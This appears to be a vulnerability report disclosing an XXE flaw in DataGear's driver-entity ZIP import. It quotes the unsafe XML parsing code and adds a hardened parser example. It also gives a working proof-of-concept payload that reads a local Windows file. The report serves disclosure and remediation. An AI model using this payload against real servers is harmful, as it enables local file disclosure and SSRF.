XML External Entity (XXE) Vulnerability in /driverEntity/uploadImportFile #34

@Z4cSec

Description

DataGear is an open-source and free data visualization analysis platform that allows you to freely create any kind of data dashboard you want, supporting access to multiple data sources such as SQL, CSV, Excel, HTTP interface, JSON, etc.

DataGear 5.1.0 and below has an XXE vulnerability. An attacker who can supply the parsed XML can use it to disclose local files on the server's file system or to perform a Server-Side Request Forgery (SSRF).


Unsafe Code

The readDriverEntities method in org/datagear/connection/XmlDriverEntityManager.java parses the XML with a default DocumentBuilderFactory, without disabling DTD (Document Type Definition) processing, and the XML content is user-controllable, so external entities declared in the document are resolved (XML External Entity injection).

// Imports implied by the snippet (the report quotes only the method body)
import java.io.Reader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

@Override
protected List<DriverEntity> readDriverEntities(Reader in) throws DriverEntityManagerException
{
    List<DriverEntity> driverEntities = new ArrayList<DriverEntity>();

    DocumentBuilderFactory documentBuilderFactory;
    DocumentBuilder documentBuilder;
    Document document;

    try
    {
       // Default factory: DOCTYPE declarations are accepted and external entities are resolved
       documentBuilderFactory = DocumentBuilderFactory.newInstance();
       documentBuilder = documentBuilderFactory.newDocumentBuilder();
       // User-controlled XML is parsed here; entity references in it are expanded
       document = documentBuilder.parse(new InputSource(in));
       // ... remainder of the method (element handling, catch block, return) is not shown in the report
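For comparison, here is a hardened version of the factory setup. This is an added example written for this page, not DataGear's own code; the class and method names (SafeDriverEntityXml, newHardenedBuilder, parseDriverEntities) and the two inline XML inputs are constructed for illustration. It disallows the DOCTYPE declaration, which is the setting that stops the payload in this report before any entity is resolved, and adds the other common entity-related features as defence in depth. Its main method parses a benign driver list and then shows the parser rejecting a DOCTYPE-bearing document.

```java
// Added example (not DataGear's code): a hardened DocumentBuilderFactory
// for parsing driverEntityInfo.xml. Names are illustrative.
import java.io.IOException;
import java.io.Reader;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class SafeDriverEntityXml
{
    /** Builds a DocumentBuilder that refuses DOCTYPE declarations and external entities. */
    static DocumentBuilder newHardenedBuilder() throws ParserConfigurationException
    {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Strongest single setting: an XXE payload needs a DOCTYPE to declare
        // its entity, so rejecting the DTD fails the parse before resolution.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case the feature above is not honoured by a parser.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    /** Parses driver-entity XML from a Reader with the hardened builder. */
    static Document parseDriverEntities(Reader in)
            throws ParserConfigurationException, SAXException, IOException
    {
        return newHardenedBuilder().parse(new InputSource(in));
    }

    public static void main(String[] args) throws Exception
    {
        // Constructed inputs: a benign driver list, and a DOCTYPE-bearing
        // document of the same shape as the report's payload, with a
        // placeholder path instead of a real file.
        String benign = "<?xml version=\"1.0\"?><driver-entities><driver-entity>"
                + "<id>mysql-jre8</id><driver-class-name>com.mysql.cj.jdbc.Driver</driver-class-name>"
                + "</driver-entity></driver-entities>";
        String withDoctype = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE driver-entities [<!ENTITY x SYSTEM \"file:///PLACEHOLDER_PATH\">]>"
                + "<driver-entities><driver-entity><id>&x;</id></driver-entity></driver-entities>";

        Document ok = parseDriverEntities(new StringReader(benign));
        System.out.println("benign document parsed, root element: "
                + ok.getDocumentElement().getTagName());

        try
        {
            parseDriverEntities(new StringReader(withDoctype));
            System.out.println("UNEXPECTED: document with DOCTYPE was accepted");
        }
        catch (SAXException e)
        {
            // Expected path: the parser refuses the DOCTYPE, so the SYSTEM
            // entity is never fetched.
            System.out.println("rejected as expected: " + e.getMessage());
        }
    }
}
```

With the JDK's built-in Xerces parser the second parse throws a SAXParseException whose message states that DOCTYPE is disallowed when the feature is set to true. If an application genuinely needs internal DTDs, the two external-entity features plus load-external-dtd=false are the minimum to keep; disallowing the DOCTYPE altogether is the simpler and safer choice for a configuration file like driverEntityInfo.xml that never needs one.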

Steps to Reproduce

Upload a zip file containing the driverEntityInfo.xml file, with the content of driverEntityInfo.xml as follows:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE driver-entities [
<!ENTITY edward SYSTEM "file:///C:/windows/win.ini">
]>
<driver-entities>
    <driver-entity>
        <id>&edward;</id>
        <driver-class-name>com.mysql.jdbc.Driver</driver-class-name>
    </driver-entity>
    <driver-entity>
        <id>mysql-jre8</id>
        <driver-class-name>com.mysql.cj.jdbc.Driver</driver-class-name>
    </driver-entity>
    <driver-entity>
        <id>oracle</id>
        <driver-class-name>oracle.jdbc.OracleDriver</driver-class-name>
    </driver-entity>
</driver-entities>

After sending the request, the response shows the value produced by XML parsing. [screenshot omitted]
